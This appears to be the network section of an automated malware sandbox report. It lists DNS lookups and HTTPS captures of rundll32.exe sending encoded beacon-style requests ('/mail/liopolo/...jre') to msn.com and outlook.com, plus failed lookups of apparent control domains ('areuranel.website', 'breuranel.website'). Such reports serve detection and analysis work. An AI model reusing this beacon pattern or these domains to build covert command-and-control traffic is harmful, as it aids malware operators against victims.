                                                                                                                                                                      Oct 11, 2021 22:36:57.602292061 CEST8.8.8.8192.168.2.70xf028No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:58.895251036 CEST8.8.8.8192.168.2.70xe9ceNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:58.895251036 CEST8.8.8.8192.168.2.70xe9ceNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:58.895251036 CEST8.8.8.8192.168.2.70xe9ceNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:58.895251036 CEST8.8.8.8192.168.2.70xe9ceNo error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:58.895251036 CEST8.8.8.8192.168.2.70xe9ceNo error (0)FRA-efz.ms-acdc.office.com40.101.124.210A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:58.895251036 CEST8.8.8.8192.168.2.70xe9ceNo error (0)FRA-efz.ms-acdc.office.com52.97.170.66A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:58.895251036 CEST8.8.8.8192.168.2.70xe9ceNo error (0)FRA-efz.ms-acdc.office.com52.97.147.178A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:59.048182011 CEST8.8.8.8192.168.2.70x3b2eNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:59.048182011 CEST8.8.8.8192.168.2.70x3b2eNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:59.048182011 CEST8.8.8.8192.168.2.70x3b2eNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:59.048182011 CEST8.8.8.8192.168.2.70x3b2eNo error (0)HHN-efz.ms-acdc.office.com52.98.208.114A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:59.048182011 CEST8.8.8.8192.168.2.70x3b2eNo error (0)HHN-efz.ms-acdc.office.com52.98.175.18A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:59.048182011 CEST8.8.8.8192.168.2.70x3b2eNo error (0)HHN-efz.ms-acdc.office.com52.97.212.34A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:59.048182011 CEST8.8.8.8192.168.2.70x3b2eNo error (0)HHN-efz.ms-acdc.office.com52.97.137.98A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:15.320671082 CEST8.8.8.8192.168.2.70x9968Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:19.310636997 CEST8.8.8.8192.168.2.70x5d7eName error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:35.972763062 CEST8.8.8.8192.168.2.70xe451No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:36.473367929 CEST8.8.8.8192.168.2.70xe936No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:39.395886898 CEST8.8.8.8192.168.2.70x173dNo error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:39.864120007 CEST8.8.8.8192.168.2.70xec9dNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:57.033107042 CEST8.8.8.8192.168.2.70x1d30Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:00.137804031 CEST8.8.8.8192.168.2.70x454fName error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.218822002 CEST8.8.8.8192.168.2.70xe5e8No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.218822002 CEST8.8.8.8192.168.2.70xe5e8No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.218822002 CEST8.8.8.8192.168.2.70xe5e8No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.218822002 CEST8.8.8.8192.168.2.70xe5e8No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.218822002 CEST8.8.8.8192.168.2.70xe5e8No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.218822002 CEST8.8.8.8192.168.2.70xe5e8No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.218822002 CEST8.8.8.8192.168.2.70xe5e8No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.218822002 CEST8.8.8.8192.168.2.70xe5e8No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.938257933 CEST8.8.8.8192.168.2.70x568aNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.938257933 CEST8.8.8.8192.168.2.70x568aNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.938257933 CEST8.8.8.8192.168.2.70x568aNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.938257933 CEST8.8.8.8192.168.2.70x568aNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.938257933 CEST8.8.8.8192.168.2.70x568aNo error (0)HHN-efz.ms-acdc.office.com52.97.219.162A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.938257933 CEST8.8.8.8192.168.2.70x568aNo error (0)HHN-efz.ms-acdc.office.com52.97.137.242A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.938257933 CEST8.8.8.8192.168.2.70x568aNo error (0)HHN-efz.ms-acdc.office.com52.98.175.2A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.938257933 CEST8.8.8.8192.168.2.70x568aNo error (0)HHN-efz.ms-acdc.office.com52.97.137.162A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:18.100589991 CEST8.8.8.8192.168.2.70xaee3No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:18.100589991 CEST8.8.8.8192.168.2.70xaee3No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:18.100589991 CEST8.8.8.8192.168.2.70xaee3No error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:18.100589991 CEST8.8.8.8192.168.2.70xaee3No error (0)FRA-efz.ms-acdc.office.com52.97.137.114A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:18.100589991 CEST8.8.8.8192.168.2.70xaee3No error (0)FRA-efz.ms-acdc.office.com52.97.178.34A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:18.100589991 CEST8.8.8.8192.168.2.70xaee3No error (0)FRA-efz.ms-acdc.office.com52.98.208.18A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.196131945 CEST8.8.8.8192.168.2.70xf49No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.196131945 CEST8.8.8.8192.168.2.70xf49No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.196131945 CEST8.8.8.8192.168.2.70xf49No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.196131945 CEST8.8.8.8192.168.2.70xf49No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.196131945 CEST8.8.8.8192.168.2.70xf49No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.196131945 CEST8.8.8.8192.168.2.70xf49No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.196131945 CEST8.8.8.8192.168.2.70xf49No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.196131945 CEST8.8.8.8192.168.2.70xf49No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.911417961 CEST8.8.8.8192.168.2.70x1000No error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.911417961 CEST8.8.8.8192.168.2.70x1000No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.911417961 CEST8.8.8.8192.168.2.70x1000No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.911417961 CEST8.8.8.8192.168.2.70x1000No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.911417961 CEST8.8.8.8192.168.2.70x1000No error (0)HHN-efz.ms-acdc.office.com52.97.219.162A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.911417961 CEST8.8.8.8192.168.2.70x1000No error (0)HHN-efz.ms-acdc.office.com52.97.137.242A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.911417961 CEST8.8.8.8192.168.2.70x1000No error (0)HHN-efz.ms-acdc.office.com52.98.175.2A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.911417961 CEST8.8.8.8192.168.2.70x1000No error (0)HHN-efz.ms-acdc.office.com52.97.137.162A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:21.069540977 CEST8.8.8.8192.168.2.70x8706No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:21.069540977 CEST8.8.8.8192.168.2.70x8706No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:21.069540977 CEST8.8.8.8192.168.2.70x8706No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:21.069540977 CEST8.8.8.8192.168.2.70x8706No error (0)HHN-efz.ms-acdc.office.com52.98.214.82A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:21.069540977 CEST8.8.8.8192.168.2.70x8706No error (0)HHN-efz.ms-acdc.office.com52.98.171.242A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:21.069540977 CEST8.8.8.8192.168.2.70x8706No error (0)HHN-efz.ms-acdc.office.com52.97.218.66A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:21.069540977 CEST8.8.8.8192.168.2.70x8706No error (0)HHN-efz.ms-acdc.office.com52.97.137.66A (IP address)IN (0x0001)

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • msn.com
                                                                                                                                                                      • outlook.com
                                                                                                                                                                      • www.outlook.com
                                                                                                                                                                      • outlook.office365.com

                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.74974913.82.28.61443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:36:12 UTC0OUTGET /mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtdN4v/UdHW73hHNRRgj93MpeR/gAwjHz21J0PRcDvLd3I609/yvRpibRLzjrjt/tNfBhMKC/cc7JRbI6tVdqBgZvAlBLjz4/UmIafwR6sLy9/c9juhd.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: msn.com
                                                                                                                                                                      2021-10-11 20:36:12 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Location: https://www.msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtdN4v/UdHW73hHNRRgj93MpeR/gAwjHz21J0PRcDvLd3I609/yvRpibRLzjrjt/tNfBhMKC/cc7JRbI6tVdqBgZvAlBLjz4/UmIafwR6sLy9/c9juhd.jre
                                                                                                                                                                      Server: Microsoft-IIS/8.5
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:36:12 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 389
                                                                                                                                                                      2021-10-11 20:36:12 UTC0INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 77 79 32 4c 30 66 4e 32 45 35 50 56 51 56 2f 64 4a 75 47 55 65 4d 6d 65 73 43 65 50 4c 4c 30 6c 37 57 67 74 2f 57 47 6b 4e 59 65 76 58 44 59 5f 32 42 38 53 46 2f 43 64 4d 5a 59 4d 58 30 45 37 42 34 6c 75 50 2f 55 6c 32 6a 6d 49 4e 61 59 75 32 51 32 54 70 6f 77 75 2f 7a 46 57 66 50 57 65 31 30 2f 48 57 52 39 54 63 39 32 50 58 69 32 73 50 57 74 64
                                                                                                                                                                      Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtd


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      1192.168.2.74975113.82.28.61443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:36:15 UTC1OUTGET /mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2FQQUDoZM2fDLMcKw_2/FKAo20C9iE_2FlWT_2Bfzo/Rp1YRopF97I_2/B8CxFQdR/_2BNrlSUvWcd0EwvOdX03BY/sLHqBgEIoN/l5xSyCjNwonJQFrna/xuhuk7iqStO6/LAN01N_2FT3/qYrzxcmDBjbOke/xPgut5GCh0/QPq7LLa.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: msn.com
                                                                                                                                                                      2021-10-11 20:36:15 UTC1INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Location: https://www.msn.com/mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2FQQUDoZM2fDLMcKw_2/FKAo20C9iE_2FlWT_2Bfzo/Rp1YRopF97I_2/B8CxFQdR/_2BNrlSUvWcd0EwvOdX03BY/sLHqBgEIoN/l5xSyCjNwonJQFrna/xuhuk7iqStO6/LAN01N_2FT3/qYrzxcmDBjbOke/xPgut5GCh0/QPq7LLa.jre
                                                                                                                                                                      Server: Microsoft-IIS/8.5
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:36:15 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 403
                                                                                                                                                                      2021-10-11 20:36:15 UTC2INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 4d 34 37 65 54 57 49 6d 77 79 4e 4a 49 58 6b 2f 62 76 42 55 6e 58 44 71 53 47 4a 6b 53 71 6e 5a 31 57 2f 49 6f 51 64 51 36 4d 48 57 2f 42 37 7a 45 30 39 51 6e 32 43 68 67 59 51 32 48 4c 59 48 5f 2f 32 46 51 51 55 44 6f 5a 4d 32 66 44 4c 4d 63 4b 77 5f 32 2f 46 4b 41 6f 32 30 43 39 69 45 5f 32 46 6c 57 54 5f 32 42 66 7a 6f 2f 52 70 31 59 52 6f 70
                                                                                                                                                                      Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2FQQUDoZM2fDLMcKw_2/FKAo20C9iE_2FlWT_2Bfzo/Rp1YRop


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      10192.168.2.74984240.97.161.50443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:38:17 UTC14OUTGET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: outlook.com
                                                                                                                                                                      2021-10-11 20:38:17 UTC14INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Location: https://www.outlook.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre
                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                      request-id: c9696fea-a1bd-d430-e498-9cfe61c858d9
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      X-FEServer: MWHPR11CA0044
                                                                                                                                                                      X-RequestId: 8a77e1fc-4c94-4f4f-98ff-62d86521ce71
                                                                                                                                                                      MS-CV: 6m9pyb2hMNTkmJz+YchY2Q.0
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      X-FEServer: MWHPR11CA0044
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:38:17 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      11192.168.2.74984352.97.219.162443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:38:18 UTC15OUTGET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: www.outlook.com
                                                                                                                                                                      2021-10-11 20:38:18 UTC15INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Location: https://outlook.office365.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre
                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                      request-id: 9e790eb8-ae6c-5e26-169b-860898d1eb64
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      X-FEServer: AS8PR04CA0058
                                                                                                                                                                      X-RequestId: 2a1ad6a3-6783-4f2a-b35a-c18784caad97
                                                                                                                                                                      MS-CV: uA55nmyuJl4Wm4YImNHrZA.0
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      X-FEServer: AS8PR04CA0058
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:38:18 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      12192.168.2.74984452.97.137.114443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:38:18 UTC16OUTGET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: outlook.office365.com
                                                                                                                                                                      2021-10-11 20:38:18 UTC16INHTTP/1.1 404 Not Found
                                                                                                                                                                      Content-Length: 1245
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                      request-id: 85b7812e-0a7c-b961-2cc4-adf543fab5ae
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      X-CalculatedFETarget: VI1PR08CU010.internal.outlook.com
                                                                                                                                                                      X-BackEndHttpStatus: 404
                                                                                                                                                                      X-FEProxyInfo: VI1PR08CA0134.EURPRD08.PROD.OUTLOOK.COM
                                                                                                                                                                      X-CalculatedBETarget: VI1PR06MB5455.EURPRD06.PROD.OUTLOOK.COM
                                                                                                                                                                      X-BackEndHttpStatus: 404
                                                                                                                                                                      X-RUM-Validated: 1
                                                                                                                                                                      X-Proxy-RoutingCorrectness: 1
                                                                                                                                                                      X-Proxy-BackendServerStatus: 404
                                                                                                                                                                      MS-CV: LoG3hXwKYbksxK31Q/q1rg.1.1
                                                                                                                                                                      X-FEServer: VI1PR08CA0134
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      X-FEServer: AS9PR06CA0260
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:38:17 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2021-10-11 20:38:18 UTC17INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      13192.168.2.74984540.97.161.50443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
